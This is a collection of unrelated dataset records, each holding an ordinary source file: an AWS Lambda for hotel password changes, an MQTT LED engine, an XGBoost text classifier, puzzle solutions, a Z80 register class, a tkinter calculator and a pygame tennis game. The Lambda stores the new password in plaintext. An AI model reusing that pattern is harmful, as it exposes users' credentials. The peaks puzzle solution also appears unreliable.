+{"seq_id":"298857601","text":"from __future__ import print_function\nimport boto3\nimport json\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.exceptions import ClientError\n\nprint('Loading function - Trocar senha hotel')\n_dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n_table = _dynamodb.Table('Hotel')\n\n# Tratamento da mensagem de retorno\ndef respond(err, res=None):\n _return = {\n 'statusCode': '400' if err else '200',\n 'body': json.dumps(err) if err else json.dumps(res),\n 'headers': {\n 'Content-Type': 'application/json',\n },\n }\n\n print(_return)\n return _return\n\n# Limpar dados\ndef removeCampoVazio(dados):\n dados_limpos = dict((k, v) for k, v in dados.items() if v)\n return dados_limpos\n\n#Validar Token\ndef validarToken(_token):\n\n _response = _table.scan(\n FilterExpression=Attr('usuario.registro_acesso').eq(_token)\n )\n return _response\n\n# Alterar informações de Login\ndef alterarSenha(_cnpj, _usuario):\n\n _table.update_item(\n Key={\n 'cnpj': _cnpj\n },\n UpdateExpression=\"set usuario = :0\",\n ExpressionAttributeValues={\n ':0': _usuario\n }\n )\n\ndef lambda_handler(event, context):\n # Limpar dados\n event = removeCampoVazio(event)\n\n #Validacao - token\n if 'token' not in event:\n return respond(\"O token obrigatório.\")\n else:\n _token = event['token']\n\n #Validacao - nome\n if 'novasenha' not in event:\n return respond(\"A nova senha é obrigatório.\")\n else:\n _novasenha = event['novasenha']\n\n # Validar Token\n try:\n _hotel = validarToken(_token)\n\n except ClientError as e:\n _message_err = \"Error ao efetuar a validação do token: \" + e.response['Error']['Message']\n return respond(_message_err)\n\n if _hotel['Count'] > 0:\n\n # Alterar Senha\n try:\n _usuario = _hotel['Items'][0]['usuario']\n _usuario['senha'] = _novasenha\n alterarSenha(_hotel['Items'][0]['cnpj'], _usuario)\n\n except ClientError as e:\n _message_err = \"Error ao efetuar a alteração da senha: \" + e.response['Error']['Message']\n return respond(_message_err)\n\n\n else:\n _message_err = \"Não foi possível encontrar o hotel através do token informado.\"\n return respond(_message_err)\n\n return respond(None, \"Alteração efetuada com sucesso\")\n","sub_path":"1in/TrocarSenha.py","file_name":"TrocarSenha.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"612081770","text":"import sys\nimport time\nimport multiprocessing\n\nfrom BaseClasses.EngineProcess import EngineProcess\nimport paho.mqtt.client as mqtt\n\n\nclass Engine:\n\n def __init__(self):\n self.isRunning = False\n self.brightness = 100\n self.subengines = []\n self.processes = []\n self.frames = {}\n self.controller = None\n self.pixellength = 0\n self.mqtt_client = None\n self.pretopic = None\n\n def startMQTT(self, pretopic, host=\"localhost\", port=1883, timeout=60):\n self.pretopic = pretopic\n self.mqtt_client = mqtt.Client()\n self.mqtt_client.on_message = self.on_message\n self.mqtt_client.connect(host, port, timeout)\n self.mqtt_client.subscribe(pretopic + \"/effekt/#\")\n self.mqtt_client.subscribe(pretopic + \"/command\")\n self.mqtt_client.subscribe(pretopic + \"/color/#\")\n self.mqtt_client.loop_start()\n\n def setControler(self, pControler):\n self.controller = pControler\n\n def on_message(self, client, userdata, msg):\n if not self.isRunning:\n print(\"Recieved MQTT message but could not be processed, because Engine is not running\")\n return\n topic = msg.topic\n if topic == self.pretopic + \"/command\": # Command\n self.on_command(msg.payload, None)\n\n elif topic.startswith(self.pretopic + \"/color/\"): # Color change\n sub_topic = topic[len(self.pretopic) + 7:]\n if sub_topic == \"brightness\":\n self.brightness = int(msg.payload)\n\n elif topic.startswith(self.pretopic + \"/effekt/\"): # Effect Command\n sub_topic = topic[len(self.pretopic) + 8:]\n for process in self.processes:\n if sub_topic.startswith(process.name + \"/\"):\n effect_topic = sub_topic[len(process.name) + 1:]\n if effect_topic == \"enable\":\n process.isEnabled = msg.payload.lower() in (\"true\", \"t\", \"1\", \"on\")\n elif process.parent is not None:\n process.parent.send(\"m:\" + effect_topic + \"/\" + msg.payload)\n\n def on_command(self, command, attributes):\n if command == \"update\":\n pass\n elif command == \"reset\":\n self.controller.setFrame([[0, 0, 0]] * self.pixellength)\n\n def addSubEngine(self, pSub, pIsEnabled):\n if not self.isRunning:\n self.subengines.append(pSub)\n self.processes.append(\n EngineProcess(pSub, pSub.mqttTopic, None, None, pIsEnabled, pSub.isCompressed, pSub.compressor)\n )\n else:\n print('Could not add SubEngine, because Engine is already running')\n\n def run(self):\n try:\n self.isRunning = True\n self.controller.setup()\n self.pixellength = self.controller.pixellength\n while self.isRunning:\n fr = time.clock()\n frames = [[-1, -1, -1]] * self.pixellength\n for process in self.processes:\n if process.isEnabled and process.parent is not None and process.process is not None:\n process.parent.send(\"f\")\n for process in self.processes:\n if process.isEnabled and process.parent is None and process.process is None:\n self.startSubEngine(process.subengine)\n elif not process.isEnabled and process.parent is not None and process.process is not None:\n self.terminateSubEngine(process.subengine)\n elif process.isEnabled:\n frame = self.frames[process.name]\n if process.parent.poll():\n if process.isCompressed:\n frame = process.compressor.decompressFrame(process.parent.recv())\n else:\n frame = process.parent.recv()\n self.frames[process.name] = frame\n for i in range(len(frames)):\n if frames[i] == [-1, -1, -1]:\n frames[i] = frame[i]\n brPercent = float(self.brightness) / 100\n completeFrame = []\n for i in range(len(frames)):\n color = []\n for a in frames[i]:\n color.append(int(max(0, a) * brPercent))\n completeFrame.append(color)\n 
self.controller.setFrame(completeFrame)\n fr = time.clock() - fr\n if fr <= 0.02:\n time.sleep(0.02 - fr)\n\n except KeyboardInterrupt:\n self.terminateAll()\n except:\n print(\"Unexpected Error in Engine:\", sys.exc_info()[0])\n print(\"Terminating all SubEngines!\")\n self.terminateAll()\n print(\"All SubEngines terminated.\")\n print(\"Shutting down Engine.\")\n\n def startSubEngine(self, engineProcess):\n if self.isRunning:\n if engineProcess.subengine.isRunning:\n print(\"Could not start SubEngine, because SubEngine is already running\")\n return\n parent, child = multiprocessing.Pipe()\n process = multiprocessing.Process(target=engineProcess.subengine.run)\n engineProcess.subengine.configure(child)\n engineProcess.process = process\n engineProcess.parent = parent\n engineProcess.isEnabled = True\n process.start()\n self.frames[engineProcess.name] = ([[-1, -1, -1]] * self.pixellength)\n else:\n print(\"Could not start SubEngine, because Engine is not running\")\n\n def terminateSubEngine(self, process):\n if not process.isEnabled:\n process.parent = None\n process.process = None\n return\n if process.parent is not None:\n print(\"Terminate Process... \" + process.name)\n process.parent.send(\"t\")\n if process.process is not None and process.process.is_alive:\n print(\"Join Process... \" + process.name)\n process.process.join()\n process.parent.close()\n process.process = None\n process.parent = None\n process.isEnabled = False\n\n def terminateAll(self):\n self.isRunning = False\n for process in self.processes:\n self.terminateSubEngine(process)\n print(\"Done!\")\n","sub_path":"BaseClasses/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
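A minimal driver for the MQTT surface that `startMQTT()` subscribes to in the Engine record above; `leds` stands in for the deployment's pretopic and `rainbow` for a registered SubEngine name, both assumptions:

```python
import paho.mqtt.client as mqtt

client = mqtt.Client()
client.connect("localhost", 1883, 60)

client.publish("leds/color/brightness", "50")        # handled under pretopic/color/#
client.publish("leds/effekt/rainbow/enable", "on")   # toggles an EngineProcess
client.publish("leds/command", "reset")              # blanks the strip via on_command
client.disconnect()
```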
+{"seq_id":"620780630","text":"import pandas as pd\nimport numpy as np\nimport re\nimport jieba\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression \nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.multiclass import OneVsRestClassifier\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.pipeline import make_pipeline\n\nfrom sklearn import svm\nfrom sklearn.naive_bayes import MultinomialNB\n\nimport os\nos.chdir('C:\\\\Users\\\\zhaohaibo\\\\Desktop')\n\n\ndef split(data):\n data = data.reset_index(drop=True)\n split_content = data.content.apply(lambda x:re.sub(' ','',x))\n split_content = split_content.apply(lambda x:re.sub('\\xa0','',x))\n split_content = split_content.astype('str').apply(lambda x: jieba.lcut(x))\n # 导入停用词\n stop = pd.read_csv('stop.txt', encoding = 'utf-8', sep = 'zhao', header = None,engine = 'python') #sep:分割符号(需要用一个确定不会出现在停用词表中的单词)\n document = []\n for i in split_content.index:\n temp = [k for k in split_content[i] if k not in stop.values]\n strr = ' '.join(temp)\n document.append(strr)\n if(i % 1000 == 0):\n print(\"Complete --- {} / {} \".format(i, len(split_content)))\n return document\n\n\n\nprint(\"(1) load texts...\")\nX = pd.read_csv('train.csv', usecols=[0,1])\ny = pd.read_csv('train.csv',usecols=[2])\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=666, shuffle = False)# shuffle默认为True\nX_test = X_test.reset_index(drop=True)\ny_train = y_train.reset_index(drop=True)\ny_test = y_test.reset_index(drop=True)\n# X_train = pd.read_csv('train.csv', usecols=[1])\n# y_train = pd.read_csv('train.csv',usecols=[2])\n# X_test = pd.read_csv('test_public.csv',usecols=[1])\ntrain_texts = split(X_train)\ntest_texts = split(X_test)\ntrain_labels = y_train\ntest_labels = y_test\n\nall_text = train_texts + test_texts\n\nprint (\"(2) doc to var...\")\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer \ncount_v0= CountVectorizer(); \ncounts_all = count_v0.fit_transform(all_text);\ncount_v1= CountVectorizer(vocabulary=count_v0.vocabulary_); \ncounts_train = count_v1.fit_transform(train_texts); \nprint (\"the shape of train is {}\".format(counts_train.shape))\ncount_v2 = CountVectorizer(vocabulary=count_v0.vocabulary_); \ncounts_test = count_v2.fit_transform(test_texts); \nprint (\"the shape of test is {}\".format(counts_test.shape))\n \ntfidftransformer = TfidfTransformer(); \ntrain_data = tfidftransformer.fit(counts_train).transform(counts_train);\ntest_data = tfidftransformer.fit(counts_test).transform(counts_test); \n\nx_train = train_data\ny_train = train_labels\nx_test = test_data\ny_test = test_labels\n\n\ndef GridsearchCV():\n# param_grid = [\n# {\n# 'learning_rate':[0.01,0.05,0.1],\n# 'n_estimators':[i for i in range(3000,5000,500)]\n# }]\n# clf = XGBClassifier()\n# grid_search = GridSearchCV(clf, param_grid,n_jobs=-1)\n# grid_search.fit(X_train,y_train)\n param_grid = { 'max_depth':range(3,10,2), 'min_child_weight':range(1,6,2)}# param_grid = {# 'max_depth':[7,8],# 'min_child_weight':[4,5]# }\n gsearch1 = GridSearchCV(estimator = XGBClassifier(),param_grid=param_grid,cv=5)\n gsearch1.fit(X_train, y_train)\n 
    return gsearch1.best_score_, gsearch1.best_estimator_\n\n\nprint (\"(3) XGBoost...\")\nfrom xgboost import XGBClassifier\nmodel = XGBClassifier(learning_rate =0.2)\nmodel.fit(x_train, y_train)\npreds = model.predict(x_test)\nnum = 0\npreds = preds.tolist()\nfor i,pred in enumerate(preds):\n    if(pred == y_test.subject[i]):\n        num += 1\nprint (\"\\n\\n precision_score:{}\".format(float(num) / len(preds)))\n\n\npreds = pd.Series(preds)\nX_test['subject'] = pd.Series(preds)\nX_test['sentiment_value'] = 0\nX_test['sentiment_word'] = None\nX_test = X_test.drop(['content'],axis=1)\nX_test.to_csv('result_svm.csv',index=False)\n","sub_path":"机器学习方法/xgboost.py","file_name":"xgboost.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"419885736","text":"# time O(n), space O(1)\n# tip: use index -1 and n to represent the boundaries to make things easier\nclass Solution(object):\n def maxDistToClosest(self, seats):\n \"\"\"\n :type seats: List[int]\n :rtype: int\n \"\"\"\n pre = -1 # the id of the previous seat that has person\n max_dist = 0\n for i, num in enumerate(seats):\n if num == 1:\n if pre == -1:\n dist = i\n else:\n dist = (i-pre)//2\n max_dist = max(max_dist, dist)\n pre = i\n \n if len(seats)-1-i <= max_dist: # early termination, much faster\n return max_dist\n \n return max(max_dist, len(seats)-1-pre) # don't miss the rightmost seat\n \n ","sub_path":"0849. Maximize Distance to Closest Person.py","file_name":"0849. Maximize Distance to Closest Person.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"59680409","text":"import csv\nimport map_1\n\n# Function to print all rows from the three service listings (housing_scv, health_scv, and job_scv)\ndef printservice(serv_list):\n print(serv_list[0].title)\n for serv in serv_list:\n print(serv.printme()) \n\n\nclass User: # class is like an template\n def __init__(self, first, last, sex_at_birth, gender_identity, age, email, prob_parl):\n self.first = first\n self.last = last \n self.age = age\n self.email = first + '.' + last + '@tsr.org'\n self.prob_parl = prob_parl\n self.sex_at_birth = sex_at_birth\n self.gender_identity = gender_identity\n # if self.age < 18 or self.age > 90:\n # print(\"Invalid age specified. Execution cannot continue, exiting.\")\n # exit\n\n def fullname(self):\n return '{} {}, Email: {} {}'.format(self.first, self.last, self.email.lower(), self.prob_parl)\n\nclass services:\n def __init__(self, name, website, description, location, phone, email):\n self.name = name\n self.website = website\n self.description = description\n self.location = location\n self.phone = phone\n self.email = email \n\nclass housing_scv(services):\n def __init__(self, name, website, description, location, phone, email, income, duration, single_occupancy, comm_housing):\n super().__init__(name, website, description, location, phone, email) \n self.income = income\n self.duration = duration\n self.single_occpancy = single_occupancy\n self.comm_housing = comm_housing\n def printme(self):\n print('\"',self.name, self.website, self.description, self.location, self.phone, self.email, self.income, self.duration, self.single_occpancy, self.comm_housing,'\"')\n title = 'name, wesite, description, location, phone, email, email, income, duration, single_occupancy, comm_housing'.title()\n\nclass job_scv(services):\n def __init__(self, name, website, description, location, phone, email, full_time, part_time, temporary, permanent):\n super().__init__(name, website, description, location, phone, email) \n self.full_time = full_time\n self.part_time = part_time\n self.temporary = temporary\n self.permanent = permanent\n def printme(self):\n print('\"',self.name, self.website, self.description, self.location, self.phone, self.email, self.full_time, self.part_time, self.temporary, self.permanent,'\"')\n title = 'name, wesite, description, location, phone, email, full_time, part_time, temporary, permanent'.title()\n\nclass health_scv(services):\n def __init__(self, name, website, description, location, phone, email, primary_care, insurance):\n super().__init__(name, website, description, location, phone, email)\n self.primary_care = primary_care\n self.insurance = insurance\n def printme(self):\n print('\"',self.name, self.website, self.description, self.location, self.phone, self.email, self.primary_care, self.insurance,'\"')\n title = 'name, wesite, description, location, phone, email, primary_care, insurance'.title()\n\n# Ask the user for first, last, age, email, prob_parl and save the user answers in variables (Prompt user ---> Google)\ndef getUser(): \n first_name = input('What is your first name?: ')\n last_name = input('What is your Last name?: ')\n sex_at_birth = input('Sex at Birth - Male/ or Female?: ')\n gender_identity = input('Gender Identity: Heterosexual, Gay, Lesbian, Transgender, or Non-binary?: ')\n age = input('How old are you?: ')\n email_address = input('What is your email address?: ')\n release_status = input('Are you currently on probation or parole?: ')\n print()\n user = User(first_name, last_name, sex_at_birth, 
gender_identity, age, email_address, release_status)\n return user\n\ndef read_health():\n health_scvs = []\n title = \"\"\n# open the csv file\n with open('services_csv_files\\health_scvs.csv') as csv_file:\n # read the csv file\n csv_reader = csv.reader(csv_file, delimiter=',')\n row_num = 0\n # loop through each line in csv\n for row in csv_reader:\n # skip the first line, which has the column names\n if row_num != 0:\n cur_scv = health_scv(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n health_scvs.append(cur_scv)\n row_num = row_num + 1\n return health_scvs\n\ndef read_housing():\n housing_scvs = []\n title = \"\" \n # open the csv file\n with open('services_csv_files\\housing_scvs.csv') as csv_file:\n # read the csv file\n csv_reader = csv.reader(csv_file, delimiter=',')\n row_num = 0\n # loop through each line in csv\n for row in csv_reader:\n # skip the first line, which has the column names\n if row_num != 0:\n cur_scv = housing_scv(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9])\n housing_scvs.append(cur_scv)\n row_num = row_num + 1 \n return housing_scvs \n\ndef read_job():\n job_scvs = []\n title = \"\" \n # open the csv file\n with open('services_csv_files\\job_scvs.csv') as csv_file:\n # read the csv file\n csv_reader = csv.reader(csv_file, delimiter=',')\n row_num = 0\n # loop through each line in csv\n for row in csv_reader:\n # skip the first line, which has the column names\n if row_num != 0:\n cur_scv = job_scv(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8], row[9])\n job_scvs.append(cur_scv)\n row_num = row_num + 1\n return job_scvs \n\nuser = getUser()\nprint(f\"Hello {user.first} {user.last}, let's find some services that are right for you!\")\n\nserv_list = read_health()\nprint(\"\\nHere are some health services for you: \")\nprintservice(serv_list)\n\nserv_list = read_housing()\nprint(\"\\nHere are some housing services for you: \")\nprintservice(serv_list)\n\nserv_list = read_job()\nprint(\"\\nHere are some job services for you: \")\nprintservice(serv_list)\n\nmap_1.domap()","sub_path":"end_project/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"592354209","text":"from app import db\nfrom datetime import datetime\nfrom app.model_base import model_base, myeye_model_base\n\nclass photo_model(model_base , myeye_model_base, db.Model):\n __tablename__ = 'device_photo'\n\n id = db.Column(db.Integer, nullable=False, primary_key=True, autoincrement=True)\n taskid = db.Column(db.Integer, db.ForeignKey('tasks.id'))\n deviceid = db.Column(db.String(50), db.ForeignKey('devices.deviceid'))\n path = db.Column(db.String(250), nullable=True, unique=False)\n size = db.Column(db.Integer, nullable=True, unique=False)\n time = db.Column(db.DateTime, default=datetime.now)\n\n columns_to_json = ['deviceid', 'taskid', 'path', 'size', 'time']\n\n def __repr__(self):\n return '' % (self.taskid)\n\n def __init__(self, taskid, deviceid, result):\n self.taskid = taskid\n self.deviceid = deviceid\n self.path = result.get('path', '')\n self.size = result.get('size', 0)\n\n","sub_path":"app/myeye/cameramodule/models/photo_model.py","file_name":"photo_model.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"632864929","text":"# -*- coding: utf-8 -*- \n\nimport os\n\nimport web \n\ncurdir = os.path.dirname(__file__)\n\n# 上传文件夹\nrelative_path = '/static/upfile/' #相对路径存入数据库,用于浏览器访问\nupload_dir = curdir + relative_path #绝对路径用于保存上传的头像\n\n\ndb_path = curdir + '/db.json' #数据库的配置文件\n\ndebug = False\n\n# url规则\nurls = (\n '/', 'src.login.Login',\n '/login', 'src.login.Login',\n '/quit', 'src.login.Quit',\n '/register', 'src.register.Register',\n '/information', 'src.information.Information',\n '/upload', 'src.image.Upload',\n '/portrait', 'src.image.AccessHandler',\n)\n\nrender = web.template.render(curdir+'/templates/', base='base')\n","sub_path":"setting.py","file_name":"setting.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"608280841","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 8 22:30:12 2021\r\n\r\n@author: andya\r\n\"\"\"\r\n\r\ndef solution(A):\r\n \r\n peak_loc = []\r\n for i in range(len(A)-2):\r\n if A[i] < A[i+1] and A[i+1] > A[i+2]:\r\n peak_loc.append(i+1)\r\n \r\n max_block = 0\r\n for i in range(len(A)+1,0,-1):\r\n if len(A)%i == 0:\r\n temp_max_block = int(len(A)/i)\r\n temp_peak = 0\r\n \r\n if len(peak_loc) > max_block:\r\n for j in range(0, len(A), i):\r\n for k in peak_loc:\r\n if j <= k <= j+i:\r\n temp_peak += 1\r\n if temp_peak == temp_max_block:\r\n max_block = temp_max_block\r\n return max_block\r\n \r\n","sub_path":"10_4_Peaks.py","file_name":"10_4_Peaks.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"195721756","text":"# Given an unsorted array of integers, find the length of the longest\n# consecutive elements sequence.\n# \n# For example,\n# Given [100, 4, 200, 1, 3, 2],\n# The longest consecutive elements sequence is [1, 2, 3, 4].\n# Return its length: 4.\n# \n# Your algorithm should run in O(n) complexity.\nimport unittest\n\nclass Solution:\n # @param num, a list of integer\n # @return an integer\n def longestConsecutive(self, num):\n hashmap = set(num)\n count = 0\n while len(hashmap)!=0:\n item = hashmap.pop()\n temp = n1 = n2 = 1\n while item-n1 in hashmap or item+n2 in hashmap:\n if item-n1 in hashmap:\n temp += 1\n hashmap.discard(item-n1)\n n1 += 1\n if item+n2 in hashmap:\n temp += 1\n hashmap.discard(item+n2)\n n2 += 1\n count = max(temp, count)\n return count\n\nclass TestFunctions(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_basic1(self):\n self.assertEqual(self.sol.longestConsecutive([100, 4, 200, 1, 3, 2]), 4)\n\n def test_basic2(self):\n self.assertEqual(self.sol.longestConsecutive([9,1,-3,2,4,8,3,-1,6,-2,-4,7]), 4)\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(TestFunctions)\nunittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"leetcode/longestConsecutive.py","file_name":"longestConsecutive.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"545964181","text":"from .exceptions import Z80StateException\nfrom .registers import Register16, Register8, register_map\n\n\"\"\"\n Copyright 2018 Robert L Snyder, Ithaca, NY \n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\n\nclass Z80State(object):\n \"\"\"\n This class represents the state of a Z80 CPU (registers, flags).\n \"\"\"\n\n def __init__(self):\n self._reg16 = {k: 0x00 for k in list(Register16)}\n self._reg8 = {Register8.I: 0x00, Register8.R: 0x00}\n\n # -------------------------------------------------------------------------\n\n def get_register_16(self, register):\n \"\"\"\n Obtains the 16 bit value from a 16 bit / combined register.\n\n :param register: the Register enum of the desired register\n :return: an integer value\n \"\"\"\n\n if not isinstance(register, Register16):\n raise Z80StateException(\"The 16-bit register designation %s is invalid.\" % register)\n return self._reg16[register]\n\n def set_register_16(self, register, v):\n \"\"\"\n Sets the 16 bit value of an 16 bit / combined register.\n\n :param register: the Register enum of the desired register\n :param v: the integer value to set; will be truncated to 16 bits\n \"\"\"\n\n if not isinstance(register, Register16):\n raise Z80StateException(\"The 16-bit register designation %s is invalid.\" % register)\n self._reg16[register] = v & 0xFFFF\n\n def get_register_8(self, register):\n \"\"\"\n Obtains the 8 bit value from an 8 bit register.\n :param register: the Register enum of the desired register\n :return: an integer value\n \"\"\"\n\n if not isinstance(register, Register8):\n raise Z80StateException(\"The 8-bit register designation %s is invalid.\" % register)\n if register in self._reg8:\n return self._reg8[register]\n else:\n return (self._reg16[register_map[register].target] >> register_map[register].shift) & 0x00FF\n\n def set_register_8(self, register, v):\n \"\"\"\n Sets the 8 bit value of an 8 bit register.\n :param register: the Register enum of the desired register\n :param v: the integer value to set; will be truncated to 8 bits\n \"\"\"\n\n if not isinstance(register, Register8):\n raise Z80StateException(\"The 8-bit register designation %s is invalid.\" % register)\n if register in self._reg8:\n self._reg8[register] = v & 0x00FF\n else:\n if register_map[register].shift == 8:\n self._reg16[register_map[register].target] = ((v << 8) & 0xFF00) | (\n self._reg16[register_map[register].target] & 0x00FF)\n else:\n self._reg16[register_map[register].target] = (v & 0x00FF) | (\n self._reg16[register_map[register].target] & 0xFF00)\n","sub_path":"simulation/z80/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"526414222","text":"from tkinter import *\r\n\r\ndef calculateInterest():\r\n p = float(principle.get())\r\n r = float(rate.get())\r\n t = float(time.get())\r\n i = (p*r*t)/100\r\n i = round(i, 2)\r\n\r\n result.destroy()\r\n\r\n message = Label(resultFrame, text = 'Interest on Rs. ' + str(p)+ \" at rate of interest \" + str(r) + \"% for \" + str(t)+ \" years is Rs. \" + str(i), bg = 'lightcyan', font = (\"Calibri\", 12), width = 70)\r\n message.place(x = 20, y = 40)\r\n message.pack()\r\n\r\nwindow = Tk()\r\n\r\nwindow.title(\"Simple Interest Calculator\")\r\nwindow.geometry(\"600x400\")\r\nwindow.configure(bg = 'lightcyan')\r\n\r\nappLabel = Label(window, text = 'SIMPLE INTEREST CALCULATOR', fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 20), bd = 5)\r\nappLabel.place(x = 20, y = 20)\r\n\r\nprincipleLabel = Label(window, text = 'Principle in Rs.', fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 12), bd = 5)\r\nprincipleLabel.place(x = 20, y = 90)\r\n\r\nprinciple = Entry(window, text = \"\", bd = 2, width = 22)\r\nprinciple.place(x = 200, y = 90)\r\n\r\nrateLabel = Label(window, text = \"Rate of Interest %\", fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 12))\r\nrateLabel.place(x = 20, y = 140)\r\n\r\nrate = Entry(window, text = \"\", bd = 2, width = 15)\r\nrate.place(x = 200, y = 140)\r\n\r\ntimeLabel = Label(window, text = \"Time in years\", fg = 'black', bg = 'lightcyan', font = (\"Calibri\", 12))\r\ntimeLabel.place(x = 20, y = 190)\r\n\r\ntime = Entry(window, text = \"\", bd = 2, width = 15)\r\ntime.place(x = 200, y = 190)\r\n\r\ncalculateButton = Button(window, text = 'CALCULATE', fg = 'black', bg = 'cyan', bd = 4, command = calculateInterest)\r\ncalculateButton.place(x = 20, y = 250)\r\n\r\nresultFrame = LabelFrame(window, text = 'Result', bg = 'lightcyan', font = (\"Calibri\", 11), width = 450)\r\nresultFrame.pack(padx = 20, pady = 20)\r\nresultFrame.place(x = 20, y = 300)\r\n\r\nresult = Label(resultFrame, text = 'Your result will be displayed here', bg = 'lightcyan', font = (\"Calibri\", 12), width = 70)\r\nresult.place(x = 20, y = 20)\r\nresult.pack()\r\n\r\nwindow.mainloop()\r\n","sub_path":"simpleinterest.py","file_name":"simpleinterest.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"555763400","text":"#!/usr/bin/env python2\n##------------------------------------------------------\n##\n## By: Jessica Ingrassellino\n## Publisher: Packt Publishing\n## Pub. Date: April 14, 2016\n## Web ISBN-13: 978-1-78528-585-1\n## Print ISBN-13: 978-1-78217-506-3\n##\n## Python Projects for Kids\n## Chapter 9 - Tiny Tennis\n##\n##------------------------------------------------------\n\n# imports, globals and drawing\n\n# imported libraries go here\nimport time\nimport pygame\nimport random\nimport math\nimport sys\n\nsys.path.append('./lib')\n\nfrom Color.Helper import Helper\nfrom TinyTennis.Ball import Ball\nfrom TinyTennis.Paddle import Paddle\nfrom TinyTennis.Screen import Screen\nfrom TinyTennis.ScoreKeeper import ScoreKeeper\n\ncolor_helper = Helper()\n\nNUMBER_BALLS = 1\n\nball_uid = 1\n\nball_dict = {}\n\nBALL_RADIUS = 10\nBALL_VELOCITY = 5\n\nBALL_COLOR = color_helper.getWhite()\nCOURT_COLOR = color_helper.getBlack()\nPADDLE_COLOR = color_helper.getBlue()\nNET_COLOR = color_helper.getYellow()\nSCORE_TEXT_COLOR = color_helper.getWhite()\n\nscreen = Screen(800, 500)\n\nscore_keeper = ScoreKeeper()\n\n# screen globals\nscreen_width = screen.getWidth()\nscreen_height = screen.getHeight()\n\ndef create_ball(i):\n\n\tball = Ball(int(screen_width / 2), int(screen_height / 2), BALL_VELOCITY, BALL_VELOCITY, BALL_RADIUS)\n\n\tball.setScreenHeight(screen_height)\n\n\tball.setScreenWidth(screen_width)\n\n\tglobal ball_uid\n\n\tball_uid += 1\n\n\tball.setId(ball_uid)\n\n\tglobal ball_dict\n\n\tball_dict[ball_uid] = ball\n\n\ndef initialize_balls(num_balls):\n\n\tfor i in range(num_balls):\n\t\n\t\tprint(\"Processing %d\" % i)\n\n\t\tcreate_ball(i)\n\n\ndef point_scored():\n\n\tglobal NUMBER_BALLS\n\t\n\tNUMBER_BALLS += 1\n\t\n\tinitialize_balls(NUMBER_BALLS)\n\t\n\tfor ball_id in ball_dict:\n\t\n\t\tball = ball_dict[ball_id]\n\n\t\tball.serve()\n\n\ndef remove_ball(ball_id):\n\n\tglobal ball_dict\n\n\tif ball_id in ball_dict:\t\n\t\tdel ball_dict[ball_id]\n\telse:\n\t\tprint(\"ball with id %d does not exist\" % ball_id)\n\n\n# initialize pygame\npygame.init()\n\ngame_screen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Tiny Tennis\")\nfont = pygame.font.SysFont(\"monospace\", 75)\n\ninitialize_balls(NUMBER_BALLS)\n\npaddle1 = Paddle(10, 10, 25, 100)\npaddle1.setScreenHeight(screen_height)\n\npaddle2 = Paddle(screen_width - 35, 10, 25, 100)\npaddle2.setScreenHeight(screen_height)\n\npygame.mouse.set_visible(0)\n\ndo_main = True\n\nwhile do_main:\n\n\t# moving the paddles\n\tpressed = pygame.key.get_pressed()\n\n\tpygame.key.set_repeat()\n\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tdo_main = False\n\n\tif pressed[pygame.K_ESCAPE]:\n\t\tdo_main = False\n\n\tif pressed[pygame.K_w]:\n\t\tpaddle1.moveDown()\n\telif 